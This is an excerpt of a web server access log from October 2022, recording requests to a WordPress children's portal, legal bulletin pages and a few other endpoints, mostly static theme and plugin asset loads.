23.100.232.233 - - [02/Oct/2022:20:12:54 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
23.100.232.233 - - [02/Oct/2022:20:12:54 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
23.100.232.233 - - [02/Oct/2022:20:12:55 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
23.100.232.233 - - [02/Oct/2022:20:12:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
216.245.221.92 - - [02/Oct/2022:20:12:56 -0500] "HEAD / HTTP/1.1" 200 -
23.100.232.233 - - [02/Oct/2022:20:12:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
23.100.232.233 - - [02/Oct/2022:20:12:56 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
23.100.232.233 - - [02/Oct/2022:20:12:57 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
23.100.232.233 - - [02/Oct/2022:20:12:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
23.100.232.233 - - [02/Oct/2022:20:12:57 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
23.100.232.233 - - [02/Oct/2022:20:12:57 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
23.100.232.233 - - [02/Oct/2022:20:12:57 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
23.100.232.233 - - [02/Oct/2022:20:12:57 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
23.100.232.233 - - [02/Oct/2022:20:12:57 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
23.100.232.233 - - [02/Oct/2022:20:12:58 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
23.100.232.233 - - [02/Oct/2022:20:12:58 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
23.100.232.233 - - [02/Oct/2022:20:12:58 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
23.100.232.233 - - [02/Oct/2022:20:12:58 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
23.100.232.233 - - [02/Oct/2022:20:12:59 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
23.100.232.233 - - [02/Oct/2022:20:12:59 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
23.100.232.233 - - [02/Oct/2022:20:12:59 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
23.100.232.233 - - [02/Oct/2022:20:12:59 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
23.100.232.233 - - [02/Oct/2022:20:12:59 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
23.100.232.233 - - [02/Oct/2022:20:13:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
23.100.232.233 - - [02/Oct/2022:20:13:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
23.100.232.233 - - [02/Oct/2022:20:13:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
23.100.232.233 - - [02/Oct/2022:20:13:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
23.100.232.233 - - [02/Oct/2022:20:13:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
23.100.232.233 - - [02/Oct/2022:20:13:01 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
23.100.232.233 - - [02/Oct/2022:20:13:01 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
201.245.192.253 - - [02/Oct/2022:20:13:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
172.22.2.4 - - [02/Oct/2022:20:12:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:20:12:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
172.22.2.4 - - [02/Oct/2022:20:14:48 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
186.80.52.211 - - [02/Oct/2022:20:14:51 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.80.52.211 - - [02/Oct/2022:20:15:00 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 394468
172.22.2.4 - - [02/Oct/2022:20:14:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63207
34.90.204.160 - - [02/Oct/2022:20:16:32 -0500] "GET / HTTP/1.1" 200 319
34.90.204.160 - - [02/Oct/2022:20:16:32 -0500] "GET / HTTP/1.1" 200 4720
157.55.39.202 - - [02/Oct/2022:20:17:22 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [02/Oct/2022:20:17:56 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Oct/2022:20:18:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
185.119.81.101 - - [02/Oct/2022:20:18:30 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [02/Oct/2022:20:18:31 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
185.119.81.101 - - [02/Oct/2022:20:19:25 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [02/Oct/2022:20:19:26 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
172.22.2.4 - - [02/Oct/2022:20:17:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.102.32.19 - - [02/Oct/2022:20:19:47 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+IxG72mNZJykyAszR8XaG/gD9eCxzqXlUwIfVroESegCgwvFCrkVL2iSaUPTRhmYEEEOlAVt+NRT/OjQxoiO46GFzKTTOA9bGMtwQUjo07Lcr4WNlCkg81+5z2ruDwMHOqLmEcqGw8FRJiIWZ8yXAxNhuz1HxmyYk24Cohs6O1h4jd0SMJtZomEWvSfhkS7Yq5oCquvyfsdq0IJpeGZ570Dj+1XAcQzUtlB2kkAX365v37SOBAG+I5sRE6eXNf4D+s7aN5tlaVJQ==&u=U2FsdGVkX19Z7GBh6sb/gyhe7FS5mlkeSFi8OmrxZ7k=&y=U2FsdGVkX1/drYKpD+G3mRHU5miP/VA+9yfdsPtfmtrihWQEPaMtAe/4xhYXxmLV HTTP/1.1" 200 25
